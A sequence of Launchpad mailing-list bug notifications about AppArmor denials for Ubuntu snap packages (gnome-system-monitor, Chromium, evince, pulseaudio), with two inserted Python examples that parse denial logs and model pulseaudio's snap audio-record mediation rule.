More help   : https://help.launchpad.net/ListHelp
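Reports in this thread mix three shapes of AppArmor denial: kernel "audit: type=1400" records, journal "AVC apparmor=" records, and D-Bus denials wrapped in msg='...'. Sorting them by which profile was denied (snapd's snap-update-ns mount helper versus the app's own snap.* profile) is the first triage step, because a snap-update-ns mount denial points at snapd's mount policy while a snap.* file denial points at the app's interface connections. The following is an added example, not code from snapd, AppArmor or any of the reporters; its sample lines are copied from the reports quoted in this thread, and the bucket names it assigns are this example's own labels.

```python
"""Parse AppArmor DENIED records from dmesg/journalctl and bucket them for triage.

Added example for this thread (not snapd/AppArmor code). SAMPLE_LOG holds lines
copied from the bug reports quoted above plus one unrelated journal line.
"""
import re
from collections import Counter

# key="quoted value" or key=bare-token; quoted values may contain spaces.
_KV = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')

SAMPLE_LOG = """\
[ 7036.430639] audit: type=1400 audit(1572541713.042:244): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
Jun 23 19:04:24 laptop-hostname audit[8109]: AVC apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=8109 comm="3" capability=6 capname="setgid"
Jun 23 19:03:17 laptop-hostname kernel: [  433.266715] audit: type=1400 audit(1529751797.796:42): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/snap/gnome-system-monitor/45/gnome-platform/" pid=7471 comm="3" srcname="/snap/gnome-3-26-1604/64/" flags="rw, bind"
audit: type=1107 audit(1572541712.846:243): pid=954 uid=106 auid=4294967295 ses=4294967295 msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/" interface="org.freedesktop.DBus.ObjectManager" member="GetManagedObjects" mask="send" name="org.bluez" pid=20568 label="snap.chromium.chromium" peer_pid=946 peer_label="unconfined" exe="/usr/bin/dbus-daemon" sauid=106 hostname=? addr=? terminal=?'
Jun 23 19:04:28 laptop-hostname pkexec[8128]: pam_unix(polkit-1:session): session opened for user root by (uid=1000)
"""


def parse_denial(line):
    """Return the key/value fields of an AppArmor DENIED record, or None."""
    if 'apparmor="DENIED"' not in line:
        return None
    # D-Bus denials (type=1107) carry the AppArmor fields inside msg='...'.
    line = re.sub(r"msg='(.*)'$", r"\1", line.strip())
    fields = {}
    for key, raw in _KV.findall(line):
        fields[key] = raw[1:-1] if raw.startswith('"') else raw
    return fields


def subject(fields):
    """The confined profile: file/mount/capable records say profile=,
    D-Bus records say label=."""
    return fields.get("profile") or fields.get("label") or "?"


def classify(fields):
    """Coarse triage bucket (this example's own labels)."""
    prof, op = subject(fields), fields.get("operation", "")
    if prof.startswith("snap-update-ns."):
        return "mount-namespace-setup"   # snapd's mount helper, not the app itself
    if prof.startswith("snap.") and op == "dbus_method_call":
        return "dbus"
    if prof.startswith("snap."):
        return "app-file-access"
    return "other"


def summarise(text):
    """Count denials per (profile, operation, object) so rare ones stand out."""
    counts = Counter()
    for line in text.splitlines():
        f = parse_denial(line)
        if f is None:
            continue
        obj = f.get("name") or f.get("capname") or f.get("interface") or "?"
        counts[(subject(f), f.get("operation", "?"), obj)] += 1
    return counts


if __name__ == "__main__":
    for (prof, op, obj), n in sorted(summarise(SAMPLE_LOG).items()):
        print(f"{n:3}  {classify({'profile': prof, 'operation': op}):22} {prof} {op} {obj}")
```

The capability denial from snap-update-ns (capname="setgid") and the mount denials with info="failed srcname match" land in the same bucket, which matches the shape of this report: the app never started because snapd's namespace setup was refused, so fixing the app's own profile would not have helped.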
[Desktop-packages] [Bug 1778332] Re: Apparmor Permission Denied (apparmor="DENIED")
Nov 11 09:47:56 kernel: audit: type=1400 audit(1573487276.018:797080): apparmor="DENIED" operation="open" profile="snap.gnome-system-monitor.gnome-system-monitor" name="/run/systemd/sessions/c1" pid=8733 comm="gnome-system-mo" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0

I'm able to reproduce this on 19.10 under X11 (but not Wayland) in the default install. I'll update snap for this denial. That fix should be in snapd 2.43.

-- 
You received this bug notification because you are a member of Desktop
Packages, which is subscribed to gnome-system-monitor in Ubuntu.
https://bugs.launchpad.net/bugs/1778332

Title:
  Apparmor Permission Denied (apparmor="DENIED")

Status in gnome-system-monitor package in Ubuntu:
  Expired

Bug description:
  I try to launch the system monitor but nothing show up.

  journalctl -f
  Result:
  Jun 23 19:04:24 laptop-hostname audit[8109]: AVC apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=8109 comm="3" capability=6 capname="setgid"
  Jun 23 19:04:24 laptop-hostname kernel: audit: type=1400 audit(1529751864.744:47): apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=8109 comm="3" capability=6 capname="setgid"
  Jun 23 19:04:24 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[8097]: cannot update snap namespace: cannot drop supplementary groups: operation not permitted
  Jun 23 19:04:24 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[8097]: snap-update-ns failed with code 1: File exists
  Jun 23 19:04:28 laptop-hostname pkexec[8128]: pam_unix(polkit-1:session): session opened for user root by (uid=1000)

  /var/log/syslog
  Result:
  Jun 23 19:03:17 laptop-hostname kernel: [  433.266715] audit: type=1400 audit(1529751797.796:42): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/snap/gnome-system-monitor/45/gnome-platform/" pid=7471 comm="3" srcname="/snap/gnome-3-26-1604/64/"
flags="rw, bind" Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.799121 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/snap/gnome-3-26-1604/64 /snap/gnome-system-monitor/45/gnome-platform none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.833637 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/usr/local/share/fonts /usr/local/share/fonts none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname kernel: [ 433.301209] audit: type=1400 audit(1529751797.828:43): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/usr/local/share/fonts/" pid=7471 comm="3" flags="ro, remount, bind" Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.835300 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/usr/share/fonts /usr/share/fonts none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.838094 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/var/cache/fontconfig /var/cache/fontconfig none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname kernel: [ 433.302850] audit: type=1400 audit(1529751797.832:44): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/usr/share/fonts/" pid=7471 comm="3" flags="ro, remount, bind" Jun 23 19:03:17 laptop-hostname kernel: [ 433.305652] audit: type=1400 audit(1529751797.832:45): apparmor="DENIED" 
operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/var/cache/fontconfig/" pid=7471 comm="3" flags="ro, remount, bind" Jun 23 19:03:17 laptop-hostname kernel: [ 433.336540] audit: type=1400 audit(1529751797.864:46): apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=7478 comm="3" capability=6 capname="setgid" Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: cannot update snap namespace: cannot drop supplementary groups: operation not permitted Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: snap-update-ns failed with code 1 Jun 23 19:03:18 laptop-hostname PackageKit: resolve transaction /260_bebcecdc from uid 1000 finished with success after 610ms To manage notifications about this bug go to: https://bugs.launchpad.n
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
** Changed in: snapd (Ubuntu)
   Status: Triaged => In Progress

** Also affects: apparmor
   Importance: Undecided
   Status: New

** Changed in: apparmor
   Status: New => Triaged

** Changed in: apparmor
   Importance: Undecided => Low

** Changed in: apparmor
   Assignee: (unassigned) => Jamie Strandboge (jdstrand)

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1848919

Title: [snap] Permission denied on Private encrypted folder

Status in AppArmor: Triaged
Status in chromium-browser package in Ubuntu: Invalid
Status in snapd package in Ubuntu: In Progress

Bug description:
When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied"

Package: chromium-browser
Version: 77.0.3865.120-0ubuntu1~snap1

To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1848919/+subscriptions

--
Mailing list: https://launchpad.net/~desktop-packages
Post to : desktop-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~desktop-packages
More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1791454] Re: system-monitor produces many apparmor permission denied warnings
Note, these accesses were added in 22d37f834b6f4605faa3887bae3cf4d0e1673278

** Changed in: gnome-system-monitor (Ubuntu)
   Status: Confirmed => Fix Released

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-system-monitor in Ubuntu.
https://bugs.launchpad.net/bugs/1791454

Title: system-monitor produces many apparmor permission denied warnings

Status in gnome-system-monitor package in Ubuntu: Fix Released

Bug description:
gnome-system-monitor (installed as snap, latest stable version) on Ubuntu 18.04.1 causes while running many warnings in the system log of the following type:

audit[2095]: AVC apparmor="DENIED" operation="open" profile="snap.gnome-system-monitor.gnome-system-monitor" name="/proc/2932/wchan" pid=2095 comm="gnome-system-mo" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000
audit[2095]: AVC apparmor="DENIED" operation="open" profile="snap.gnome-system-monitor.gnome-system-monitor" name="/proc/1/cgroup" pid=2095 comm="gnome-system-mo" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0

The output of
journalctl | grep "operation=\"open\" profile=\"snap.gnome-system-monitor.gnome" | wc -l
amounts on my system to 4 924 215. For comparison
journalctl | wc -l
amounts to 5 143 715. Thus it is really spamming my system log.

output of snap info gnome-system-monitor is attached.

output of lsb_release -rd:
Description: Ubuntu 18.04.1 LTS
Release: 18.04

To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gnome-system-monitor/+bug/1791454/+subscriptions
[Desktop-packages] [Bug 1851211] Re: [snap] SoloKeys not supported by u2f-devices interface
I've added it to my trello card for 2.43 policy updates.

** Changed in: snapd (Ubuntu)
   Status: New => Triaged

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1851211

Title: [snap] SoloKeys not supported by u2f-devices interface

Status in chromium-browser package in Ubuntu: Confirmed
Status in snapd package in Ubuntu: Triaged

Bug description:
This affects the current build of the snap version of Chromium. Although it was marked as fixed in the ticket here: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1738164 it is still open. No chance to use such a key in the browser.

dmesg output is:

My dmesg output shows a lot of DENIED:

audit: type=1107 audit(1572541712.846:243): pid=954 uid=106 auid=4294967295 ses=4294967295 msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/" interface="org.freedesktop.DBus.ObjectManager" member="GetManagedObjects" mask="send" name="org.bluez" pid=20568 label="snap.chromium.chromium" peer_pid=946 peer_label="unconfined" exe="/usr/bin/dbus-daemon" sauid=106 hostname=? addr=? terminal=?'
[ 7036.430639] audit: type=1400 audit(1572541713.042:244): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
[ 7036.430641] audit: type=1400 audit(1572541713.042:245): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
[ 7049.256201] audit: type=1400 audit(1572541725.870:246): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/sys/devices/pci:00/:00:15.1/i2c_designware.1/i2c-2/i2c-ELAN1200:00/0018:04F3:3022.0001/report_descriptor" pid=20568 comm="ThreadPoolForeg" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0

Suggested solutions in the other tickets do not work

System is Ubuntu 19.10 on an Asus UX330
---
ProblemType: Bug
ApportVersion: 2.20.11-0ubuntu8.2
Architecture: amd64
CurrentDesktop: ubuntu:GNOME
DRM.card0-HDMI-A-1:
 enabled: enabled
 dpms: On
 status: connected
 edid-base64: AP///wAebcxW838CAAYUAQOANR54Cq7FoldKnCUSUFQhCACzAIGAgUABAQEBAQEBAQEBGjaAoHA4H0AwIDUAEyshAAAaAjqAGHE4LUBYLEUAEyshAAAe/QA4PR5TDwAKICAgICAg/ABXMjQ0MgogICAgICAgATICAyHxTpAEAwEUEgUfEBMAIwkHB4MBAABlAwwAEAACOoAYcTgtQFgsRQATKyEAAB4BHYAYcRwWIFgsJQATKyEAAJ4BHQByUdAeIG4oVQATKyEAAB6MCtCKIOAtEBA+lgATKyEAABgAJg==
 modes: 1920x1080 1920x1080 1920x1080 1920x1080 1920x1080i 1920x1080i 1920x1080i 1920x1080 1920x1080i 1680x1050 1280x1024 1280x960 1280x720 1280x720 1280x720 1280x720 1024x768 800x600 720x576 720x480 720x480 720x480 720x480 640x480 640x480 640x480
DRM.card0-eDP-1:
 enabled: disabled
 dpms: Off
 status: connected
 edid-base64: AP///wAGry0nABAZAQSVHRF4ArwFolVMmiUOUFQBAQEBAQEBAQEBAQEBAQEBFDeAuHA4JEAQED4AJaUQAAAY/gBBVU8KICAgICAgICAg/gBCMTMzSEFOMDIuNyAKAII=
 modes: 1920x1080
DiskUsage:
 Filesystem  Type   Size  Used  Avail  Use%  Mounted on
 /dev/sda6   ext4   184G  35G   140G   20%   /home
 tmpfs       tmpfs  7,8G  152M  7,7G   2%    /dev/shm
 /dev/sda6   ext4   184G  35G   140G   20%   /home
DistroRelease: Ubuntu 19.10
InstallationDate: Installed on 2017-09-30 (766 days ago)
InstallationMedia: Ubuntu 17.04 "Zesty Zapus" - Release amd64 (20170412)
Lsusb:
 Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
 Bus 001 Device 004: ID 8087:0a2b Intel Corp.
 Bus 001 Device 003: ID 0bda:58d1 Realtek Semiconductor Corp. USB2.0 HD UVC WebCam
 Bus 001 Device 002: ID 046d:c52b Logitech, Inc. Unifying Receiver
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
MachineType: ASUSTeK COMPUTER INC. UX330UAK
Package: chromium-browser 77.0.3865.120-0ubuntu1.19.10.1
PackageArchitecture: amd64
ProcEnviron:
 TERM=xterm-256color
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=
 LANG=de_DE.UTF-8
 SHELL=/bin/bash
ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.3.0-19-generic root=UUID=33f0c319-6f77-49d2-85ed-236d397fc004 ro quiet splash vt.handoff=7
ProcVersionSignature: Ubuntu 5.3.0-19.20-generic 5.3.1
Snap.ChromeDriverVersion: ChromeDriver 78.0.3904.70 (edb9c9f3de0247fd912a77b7f6cae7447f6d3ad5-refs/branch-heads/3904@{#800})
Snap.ChromiumVersion: Chromium 78.0.3904.70 snap
Tags: eoan snap
Uname: Linux 5.3.0-19-generic x86_64
UpgradeStatus: Upgraded to eoan on 2019-10-23 (14 days ago)
UserGroups: adm cdrom daemon dialout dip docker kvm lpadmin plugdev sambashare sudo www-data
_MarkForUpload: True
dmi.bios.date: 04/19/2019
dmi.bios.vendor: American Megatrends Inc.
dmi.bios.version: UX330UAK.315
dmi.boar
[Desktop-packages] [Bug 1794064] Re: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap
** Changed in: evince (Ubuntu)
   Status: Confirmed => Triaged

** Changed in: evince (Ubuntu)
   Assignee: (unassigned) => Jamie Strandboge (jdstrand)

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu.
https://bugs.launchpad.net/bugs/1794064

Title: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap

Status in evince package in Ubuntu: Triaged

Bug description:
This is related to bug #1792648. After fixing that one (see discussion at https://salsa.debian.org/gnome-team/evince/merge_requests/1), clicking a hyperlink in a PDF opens it correctly if the default browser is a well-known application (such as /usr/bin/firefox), but it fails to do so if the default browser is a snap (e.g. the chromium snap).

This is not a recent regression, it's not working on bionic either.

ProblemType: Bug
DistroRelease: Ubuntu 18.10
Package: evince 3.30.0-2
ProcVersionSignature: Ubuntu 4.18.0-7.8-generic 4.18.5
Uname: Linux 4.18.0-7-generic x86_64
NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
ApportVersion: 2.20.10-0ubuntu11
Architecture: amd64
CurrentDesktop: ubuntu:GNOME
Date: Mon Sep 24 12:28:06 2018
EcryptfsInUse: Yes
InstallationDate: Installed on 2016-07-02 (813 days ago)
InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1)
SourcePackage: evince
UpgradeStatus: Upgraded to cosmic on 2018-09-14 (9 days ago)
modified.conffile..etc.apparmor.d.abstractions.evince: [modified]
mtime.conffile..etc.apparmor.d.abstractions.evince: 2018-09-24T11:35:41.904158

To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1794064/+subscriptions
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
Ok, I'll fix this in the next batch of policy updates for snapd.

** Changed in: snapd (Ubuntu)
   Importance: Undecided => Low

** Changed in: snapd (Ubuntu)
   Status: New => Triaged

** Changed in: snapd (Ubuntu)
   Assignee: (unassigned) => Jamie Strandboge (jdstrand)

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1848919

Title: [snap] Permission denied on Private encrypted folder

Status in chromium-browser package in Ubuntu: Confirmed
Status in snapd package in Ubuntu: Triaged

Bug description:
When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied"

Package: chromium-browser
Version: 77.0.3865.120-0ubuntu1~snap1

To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1848919/+subscriptions
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
Ok, that is a read on /home/ubuntu/.Private/. Is the encrypted home mounted at the time of the denial?

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1848919

Title: [snap] Permission denied on Private encrypted folder

Status in chromium-browser package in Ubuntu: Confirmed
Status in snapd package in Ubuntu: New

Bug description:
When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied"

Package: chromium-browser
Version: 77.0.3865.120-0ubuntu1~snap1

To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1848919/+subscriptions
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
Encrypted home is typically set up as ~/.Private, not ~/Private and the policy already allows:

owner @{HOME}/.Private/** mrixwlk,
owner @{HOMEDIRS}/.ecryptfs/*/.Private/** mrixwlk,

The home interface should already allow ~/Private. What is the denial you see in the logs?

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1848919

Title: [snap] Permission denied on Private encrypted folder

Status in chromium-browser package in Ubuntu: Confirmed
Status in snapd package in Ubuntu: New

Bug description:
When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied"

Package: chromium-browser
Version: 77.0.3865.120-0ubuntu1~snap1

To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1848919/+subscriptions
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Changed in: pulseaudio (Ubuntu Xenial)
   Status: In Progress => Triaged

** Changed in: pulseaudio (Ubuntu Bionic)
   Status: In Progress => Triaged

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu.
https://bugs.launchpad.net/bugs/1781428

Title: please enable snap mediation support

Status in pulseaudio package in Ubuntu: Fix Released
Status in pulseaudio source package in Xenial: Triaged
Status in pulseaudio source package in Bionic: Triaged

Bug description:
[Impact]
Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected.

To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated with a patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface-deprecation/13418).

The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in this manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU.

[Test Case]
IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy

For unconfined applications:
$ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
yes
$ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
^Cyes
$ paplay /tmp/out.wav && echo "yes"
yes

For confined, non-snap applications:
$ sudo apt-get install evince
$ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes
$ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
^Cyes
$ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes"
yes

For classic snaps:
$ sudo snap install test-snapd-classic-confinement --classic
$ snap run --shell test-snapd-classic-confinement
$ cat /proc/self/attr/current # verify we are classic confined
snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)
$ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
yes
$ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
^Cyes
$ paplay /tmp/out.wav && echo "yes"
yes

For strict snaps with pulseaudio:
$ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap
$ snap connections test-snapd-pulseaudio
Interface   Plug                              Slot         Notes
pulseaudio  test-snapd-pulseaudio:pulseaudio  :pulseaudio  -
$ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created
...
$ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-pulseaudio/common/
$ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes
xcb_connection_has_error() returned true
yes
(note, the xcb_connection_has_error() message is due to the x11 interface not being connected which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested)
$ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass
...
^Cyes
$ test-snapd-pulseaudio.play /tmp/out.wav && echo yes
...
yes

For strict snaps with audio-playback/audio-record:
$ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04
$ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap
$ snap connections test-snapd-audio-record # record not connected
Interface       Plug                                    Slot             Notes
audio-playback  test-snapd-audio-record:audio-playback  :a
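The [Impact] section above describes the mediation rule the pulseaudio module applies: playback for everyone, record for non-snap clients and classic snaps, and record for strict snaps only when the pulseaudio or audio-record plug is connected. The following is an added example from the editor and is not the pulseaudio module's code or snapd-glib's API: it models that decision as a pure function, with the answers snapd would give (confinement and connected plugs) supplied by a caller-provided lookup over constructed data, so the rule can be exercised offline against the same labels the [Test Case] section shows (including the " (complain)" suffix that /proc/self/attr/current prints). The fail-closed choice for a snap that snapd does not know about is the editor's assumption, not something the bug states.

```python
PLAYBACK = "playback"
RECORD = "record"

# Constructed stand-in for what snapd would report about each snap:
# its confinement and the set of plugs currently connected. These mirror
# the three test snaps used in the [Test Case] section.
FAKE_SNAPD = {
    "test-snapd-classic-confinement": {"confinement": "classic", "connected": set()},
    "test-snapd-pulseaudio": {"confinement": "strict", "connected": {"pulseaudio"}},
    "test-snapd-audio-record": {"confinement": "strict", "connected": {"audio-playback"}},
}

# Either of these plugs being connected lets a strict snap record.
RECORD_PLUGS = {"pulseaudio", "audio-record"}


def snap_name_from_label(label):
    """Return the snap name from a 'snap.<snap>.<app>' security label, or None
    for non-snap clients ('unconfined', '/usr/bin/evince', ...).

    Labels read from /proc/<pid>/attr/current may carry a ' (mode)' suffix,
    e.g. 'snap.foo.bar (complain)'; it is stripped before parsing."""
    label = label.split(" ", 1)[0]
    if not label.startswith("snap."):
        return None
    parts = label.split(".")
    if len(parts) < 3 or not parts[1]:
        return None  # malformed label: do not treat as a snap
    return parts[1]


def access_allowed(label, operation, lookup=None):
    """Decide whether a pulseaudio client with the given AppArmor label may
    perform `operation`, following the rule described in the bug:
      - playback is allowed for every connected client;
      - record is allowed for non-snap clients;
      - record is allowed for classic snaps;
      - record is allowed for strict snaps only if pulseaudio or audio-record
        is connected.
    `lookup(snap_name)` returns the snapd answer or None (assumption: unknown
    snaps are denied)."""
    if operation == PLAYBACK:
        return True
    if operation != RECORD:
        raise ValueError(f"unknown operation {operation!r}")
    snap = snap_name_from_label(label)
    if snap is None:
        return True  # not a snap: pulseaudio does not mediate it
    info = (lookup or FAKE_SNAPD.get)(snap)
    if info is None:
        return False  # editor's assumption: fail closed if snapd has no answer
    if info["confinement"] == "classic":
        return True
    return bool(info["connected"] & RECORD_PLUGS)


if __name__ == "__main__":
    for label in ("unconfined", "/usr/bin/evince",
                  "snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)",
                  "snap.test-snapd-pulseaudio.record",
                  "snap.test-snapd-audio-record.record"):
        print(f"{label!r}: record allowed = {access_allowed(label, RECORD)}")
```

Running the script reproduces the expected outcomes of the test case: only the test-snapd-audio-record snap, whose audio-record plug is not connected, is refused; connecting that plug (a lookup that reports it as connected) flips the answer to allowed without any change to the playback path.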
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Description changed:

  [Impact]
  Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected.

  To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated with a patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface-deprecation/13418).

  The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in this manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU.

  [Test Case]
- Since the pulseaudio mediation behavior triggers when the security label
- starts with 'snap.' it is su
+ IMPORTANT: if updating pulseaudio while the session is running, either
+ need to reboot for the test or kill pulseaudio so it can restart with
+ the new snap policy

  For unconfined applications:
  $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
  yes
  $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
  ^Cyes
  $ paplay /tmp/out.wav && echo "yes"
  yes

  For confined, non-snap applications:
  $ sudo apt-get install evince
  $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes
  $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
  ^Cyes
  $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes"
  yes

  For classic snaps:
  $ sudo snap install test-snapd-classic-confinement --classic
  $ snap run --shell test-snapd-classic-confinement
  $ cat /proc/self/attr/current # verify we are classic confined
  snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)
